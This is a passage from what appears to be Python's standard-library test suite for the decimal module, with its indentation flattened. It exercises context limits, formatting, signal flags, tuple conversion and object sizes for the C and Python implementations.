with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
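# checkSameDec evaluates the named operation and then verifies that the
# internal _sign/_int/_exp attributes of the operand(s) are unchanged,
# i.e. that Decimal operations never mutate their arguments.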
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
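# On 32-bit builds MAX_PREC is exactly 425000000; on 64-bit builds it is far
# larger, so this flag distinguishes the two configurations.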
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c, 'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
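# Arguments that still fit into a C integer but lie outside the allowed
# exponent range signal InvalidOperation; arguments that cannot be converted
# at all raise OverflowError instead.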
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
FloatOperation = C.FloatOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
FloatOperation: C.DecFloatOperation,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
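# Every additional group of 19 (64-bit build) or 9 (32-bit build) decimal
# digits requires one more coefficient word, growing the object by exactly
# 8 or 4 bytes respectively.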
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
# Issue 41540:
@unittest.skipIf(sys.platform.startswith("aix"),
"AIX: default ulimit: test is flaky because of extreme over-allocation")
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_maxcontext_exact_arith(self):
# Make sure that exact operations do not raise MemoryError due
